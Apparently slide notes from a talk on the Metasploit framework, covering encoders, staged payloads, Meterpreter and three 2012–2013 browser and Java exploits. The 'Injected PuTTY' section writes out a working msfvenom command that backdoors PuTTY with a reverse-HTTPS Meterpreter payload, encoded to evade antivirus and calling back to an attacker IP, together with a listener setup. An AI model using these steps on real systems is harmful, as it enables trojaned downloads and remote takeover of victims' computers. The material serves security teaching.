Agenda
- Overview
- Injected PuTTY
- IE8 Heap Spray
- Web Scan & Java break-in
- Java Sandbox Break-out
- Conclusions
History
2003 – | created by H.D. Moore |
2007 – | rewritten in Ruby (from Perl) |
2009 – | acquired by Rapid7 (still under BSD license) |
What is it?
- a framework (collection of tools and resources)
- used for penetration testing (pentesting)
- runs on Unices and Windows
Interfaces
- Metasploit Framework (command line)
- Metasploit Community (web based)
- Metasploit Express & Pro (commercial web based)
- Armitage (GUI)
Auxiliary Modules
- Used for scanning, fuzzing, sniffing and others
- Scanning example:
- Locating the Tomcat Server administration panel.
- FTP servers with anonymous access.
- Bruteforce SSH servers.
- Servers for capturing credentials for POP3, SMB, FTP, etc.
Rex library
- Independent classes and modules that provide the features necessary for the rest of the system like:
- generating assembly instructions programmatically for certain architectures;
- support for useful protocols like HTTP, SMB;
- encoding;
- Opcode Database interaction, etc.
Basics
vulnerability → exploit → payload
Exploits
- Active:
- Run against a specific host.
- Example: against a server running badly configured or vulnerable software.
- Passive:
- Waiting on connections from victims.
- Example: publishing a injected file, serving Java/Flash exploits on HTTP.
Scenario
- The bad guy hosts a mirror of PuTTY which contains injected code.
- He listens for connections from a specific machine.
- The victim is running any recent Windows.
Injecting encoded payloads
# Downloading the latest PuTTY.
wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
msfvenom \
-p windows/meterpreter/reverse_https `# The payload.`\
-e x86/shikata_ga_nai `# Encode with Shikata ga nai...`\
-i 25 `# ...using 25 iterations.`\
-f exe `# Output as a Windows EXE file.`\
-k `# Inject as a new thread (preserves the template behaviour.)`\
-x ./putty.exe `# Using PuTTY as a template.`\
LHOST=192.168.1.102 `# The IP to connect back to (this machine).`\
LPORT=443 `# Default HTTPS port (inconspicuous).`\
> putty_bad.exe `# The output file.`
python - SimpleHTTPServer 80
msfpayload
Generates all the types of shellcodes.
msfencode
Encodes binary code in order to evade anti-viruses and get rid of bad characters.
msfvenom
The combination these two tools.
How supicious is this?
- Virustotal is a free service which scans files using multiple anti-viruses.
- Using it, 7 of 48 anti-viruses detect the encoded injected payload.
- But they all say something different!
- They heuristically detect that something is suspicious, but not the specific threat.
Listening for victims
$ msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lport 443
set lhost 192.168.1.102
exploit
And now wait...
Let's analyze more closely.
Structure of injected file
Basic malware:
Polymorphic malware:
Why encode the payload?
- The transmission protocol or the vulnerable application may be sensitive to certain data.
- A payload is usually encoded to make sure it can pass through and not break.
- A common bad character is a null byte since it limits C strings.
- The stub is usually very small.
Types of encoding
- polymorphic / non-polymorphic
- alphanumeric / non-alphanumeric
Polymorphic:
- DWORD_XOR Encoder (15+4 bytes): Uses a random 4 byte key.,
- Countdown Encoder (12+0 bytes): XORs the shellcode depending on a increasing register.
- FNSTENV_MOV Encoder (15+4 bytes): Uses the floating point unit (FPU) environment.
- Jmp_call_additive encoder (21+4 bytes): Every DWORD is encoded with a different key depending on the previous decoding.
DWORD_XOR Encoder (source)
Rex::Arch::X86.sub(-(((state.buf.length - 1) / 4) + 1), Rex::Arch::X86::ECX,
state.badchars) +
"\xe8\xff\xff\xff" + # call $+4
"\xff\xc0" + # inc eax
"\x5e" + # pop esi
"\x81\x76\x0eXORK" + # xor [esi + 0xe], xork
"\x83\xee\xfc" + # sub esi, -4
"\xe2\xf4" # loop xor
Shikata ga nai
- A Japanese expression meaning “it cannot be helped”.
- A.k.a. Polymorphic XOR Additive Feedback Encoder.
- The best rated encoder. Highly polymorphic. Difficult to understand.
Payloads
- That is not the full payload!
- Self contained payloads are more stable, but usually too big.
- Windows Meterpreter is 700 kB.
- So payloads are sent in stages.
- The included code only contains the stager.
- (Windows provides the WinINet library that makes it easy to grab content from any URL thus keeping the stager small.)
Stager
- Establishes a connection to the attacker and processes further stages.
Reverse HTTPS Stager
- Tunnels communication over HTTP using SSL.
- Advantages:
- HTTPS over port 443 is permitted in even in corporate environments.
- Inner traffic cannot be analyzed.
- HTTP doesn't maintain a TCP session.
Reflective DLL injection
- A technique for loading code which provides a reflective loader function.
- The initial code downloads more stages directly into memory (by any means: raw sockets, HTTPS etc).
- The reflective loader allocated Read-Write-Execute memory and constructs the executable code there.
- The code can be used as any other library.
- Advantages: hard to detect. Languages like Java use JIT compilation to write code in memory and execute it.
Some payloads:
- PassiveX: circumvents firewalls by using an ActiveX control to create a hidden IE instance which can communicate freely with the attacker.
- NoNX: bypasses the no-execute bit implementation in Windows (Data Execution Prevention).
- Meterpreter: the biggest and most powerful payload.
Meterpreter
- Stealthily loaded into the memory of the process without writing to disk.
- It can spawn and migrate to other processes.
- Uses encrypted communication by default.
- Can be extended at runtime by loading other DLLs.
Meterpreter Features
- cat, cd, ls, pwd, ipconfig, ps: What you expect
- edit: Edit files using Vim. (cuz Emacs sux!)
- download, upload: get and send to the victim's system.
- execute: run a command
- hashdump: get the SAM database (passwords file).
- migrate: migrate to another process.
- shell: get a standard shell (like cmd).
- webcam_snap: take a webcam picture.
- Other things: capture keyboard, microphone; generate clicks and keystrokes...
Details
- A HTML+JS memory corruption bug in IE 8.
- Requires certain libraries to work: JRE for Windows XP SP3, Vista SP2 and 7 SP1; or Visual C++ Runtime for XP SP3.
- Reason: IE doesn't sanitize user-supplied input when handling same ID property.
- Uses a JS lib for heap feng shui.
- Manipulates the heap layout by making heap allocations.
- Depends on the specific platforms. Here: IE and Windows.
Heap spraying
- Fills large amounts of memory with the shellcode and NOP sleds in order to get the right locations.
- It tries to compensate for the non-determinism of induced by time, chance alignments and other factors.
- Takes advantage of the fact that heap allocations are usually sequential.
Idea
- The HTML page contains two elements with the same id (say
idName
)
- The memory is sprayed with the shellcode.
- Mouse events are triggered in which one element is deleted.
- The ID is referenced using
eval('idName')
. (It's supposed to return the element.)
Details
- Takes advantage of the Java RMI Server default config.
- (An active exploit.)
- Java Remote Method Invocation is a OOP RPC.
- The default config allows loading classes from any remote HTTP location.
- Bytecode Advantage(TM pending): the vulnerability works reliably across 5 different platforms and 3 architectures.
- RMI method calls don't do any authentication.
- Affects Oracle Java versions prior to 7u25.
- Runs from an applet and escapes the Java sandbox through memory corruption bug.
- It's caused by invalid array indexing in the storeImageArray() function on the native jre/bin/awt.dll.
- This code calls storeImageArray and causes the coruption:
new AffineTransformOp(new java.awt.geom.AffineTransform(1,0,0,1,0,0), null);
? | Discovered through the Packet Storm Bug Bounty program. |
18.06.2013 | Fixed by Oracle. |
11.08.2013 | Disclosed. |
15.08.2013 | Implemented in Metasploit. |
Conclusions
- Metasploit is the most successful such framework.
- Considered the de facto exploit development framework.
Others
- w3af: less general than Metasploit.
- Core Impact: best competitor, but not free.
Prevention (usual stuff)
- Use up to date software.
- Security through obscurity:
- Configure software to not give its identity and version.
- Use non-default ports.
- Don't pass sensitive date through insecure channels (e.g.: FTP, telnet).
Sources
http://www.offensive-security.com/metasploit-unleashed/
http://en.wikipedia.org/wiki/Metasploit_Project
http://www.exploit-db.com/wp-content/themes/exploit/docs/18532.pdf
http://blog.strategiccyber.com/2013/06/28/staged-payloads-what-pen-testers-should-know/
http://www.rapid7.com/db/modules/exploit/windows/browser/ms12_037_same_id
http://www.rapid7.com/db/modules/exploit/multi/misc/java_rmi_server
http://www.rapid7.com/db/modules/exploit/multi/browser/java_storeimagearray
http://www.osvdb.org/82865
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ms12_037_same_id.rb
http://www.exploit-db.com/exploits/27526/
http://en.wikipedia.org/wiki/Heap_spraying
https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
http://www.levinkv.ru/bezopasnost/metasploit/metasploit-penetration-testing-cookbook-%D1%87%D0%B0%D1%81%D1%82%D1%8C-1.html
http://www.harmonysecurity.com/files/HS-P005_ReflectiveDllInjection.pdf